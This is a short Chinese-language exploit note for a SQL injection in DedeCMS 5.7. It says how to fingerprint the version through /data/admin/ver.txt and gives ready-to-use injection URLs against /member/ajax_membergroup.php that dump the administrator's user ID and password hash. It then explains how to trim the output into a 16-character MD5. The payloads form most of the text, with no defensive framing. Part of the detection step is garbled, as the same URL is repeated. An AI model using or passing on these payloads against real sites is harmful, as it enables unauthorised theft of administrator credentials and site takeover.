dedecms5.7注入漏洞

漏洞判断

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，然后访问

“/member/ajax_membergroup.php?action=post&membergroup=1”页面，

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面

证明是有漏洞存在的

然后写上语句

/member/ajax_membergroup.php?action=post&amp;membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

/member/ajax_membergroup.php?action=post&amp;membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5